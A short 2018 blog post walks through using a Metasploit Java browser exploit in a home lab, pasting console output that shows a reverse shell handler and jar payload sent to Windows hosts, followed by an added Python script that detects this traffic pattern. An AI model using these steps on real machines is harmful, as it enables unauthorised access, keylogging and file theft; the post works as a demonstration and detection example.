Hacking with Metasploit

by Jon on January 27th, 2018
in Background

Always fun to play with Metasploit. For those who don't know, it was an open source project but is now run by the company Rapid7. There are supported versions but there is a free version called Framework edition. It doesn't have a graphical interface, but I am a real man and like using command line anyway.

The help page is great.

In brief:

  • Set up Metasploit on a Linux box (if you are a real hacker and use Kali Linux it is of course included).
  • Choose an "exploit" - I used one based on an old Java version
  • Find a Windows box which has an old Java
  • Point the browser on the Windows machine at the web site on your Metasploit machine
  • The machine is hacked! From the Metasploit machine you can run scripts, copy files, take screenshots, even use the microphone and camera.

It works even if the Windows machine is patched (except for the one vulnerability you are working on), is firewalled, and has antivirus. It is a great demo to show people just how vulnerable their PC is.

More info on this hack

This is an old one, but a good one and, as I said, a great demo. All you need to do is make sure your Windows machine has the right version of Java, and Oracle, conveniently, has an archive of old Java versions available online.

Fire up Metasploit.

msf exploit(multi/browser/java_atomicreferencearray) > exploit
[*] Exploit running as background job 1.
msf exploit(multi/browser/java_atomicreferencearray) >
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Using URL: http://192.168.1.10:8080/index.htm
[*] Server started.
[*] 192.168.1.4 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.4 java_atomicreferencearray - Sending java reverse shell
[*] 192.168.1.4 java_atomicreferencearray - Generated jar to drop (5309 bytes).
[*] 192.168.1.2 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability

[*] 192.168.1.2 java_atomicreferencearray - Sending java reverse shell
[*] 192.168.1.2 java_atomicreferencearray - Generated jar to drop (5309 bytes).
[*] 192.168.1.2 java_atomicreferencearray - Sending jar\r\n

On the Windows PC, go to http://192.168.1.10:8080/index.htm and then, in Metasploit, we are on the Windows machine.

Even though the user is not an admin, we can copy any of his files, watch everything he types (keylogger), and take screenshots.
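
The console output above also shows what this looks like on the network: the client pulls a jar from the web server on port 8080 and then connects back to the same host on port 4444. The following is an added example, not part of the original post, that flags that sequence in flow or proxy records; the CSV layout, the 30 second window and the sample rows are assumptions constructed for illustration.

```python
import csv
import io
from datetime import datetime, timedelta

# Constructed flow/proxy records (not captured traffic). Addresses and ports
# mirror the console output above; the CSV layout is an assumption.
SAMPLE = """\
ts,src,dst,dport,content_type
2018-01-27T10:00:01,192.168.1.2,192.168.1.10,8080,text/html
2018-01-27T10:00:02,192.168.1.2,192.168.1.10,8080,application/java-archive
2018-01-27T10:00:04,192.168.1.2,192.168.1.10,4444,
2018-01-27T10:00:05,192.168.1.4,192.168.1.10,8080,application/java-archive
2018-01-27T10:05:00,192.168.1.7,192.168.1.20,8080,application/java-archive
2018-01-27T10:05:03,192.168.1.7,192.168.1.30,443,
"""

WINDOW = timedelta(seconds=30)  # assumed correlation window


def find_jar_then_callback(log_text, window=WINDOW):
    """Flag clients that fetch a JAR over HTTP and then, within `window`,
    open a connection to the same server on a different port."""
    last_jar = {}  # (client, server) -> (time, port) of the latest JAR download
    alerts = []
    rows = sorted(csv.DictReader(io.StringIO(log_text)), key=lambda r: r["ts"])
    for r in rows:
        ts = datetime.fromisoformat(r["ts"])
        key = (r["src"], r["dst"])
        port = int(r["dport"])
        if r["content_type"] == "application/java-archive":
            last_jar[key] = (ts, port)
        elif key in last_jar:
            jar_ts, jar_port = last_jar[key]
            # Same client, same server, new port, shortly after the JAR.
            if port != jar_port and ts - jar_ts <= window:
                alerts.append({"client": r["src"], "server": r["dst"],
                               "jar_port": jar_port, "callback_port": port,
                               "delay_s": (ts - jar_ts).total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in find_jar_then_callback(SAMPLE):
        print(alert)
```

A JAR download with no follow-up connection, or a follow-up to a different server, is not flagged, so ordinary Java applet traffic stays quiet.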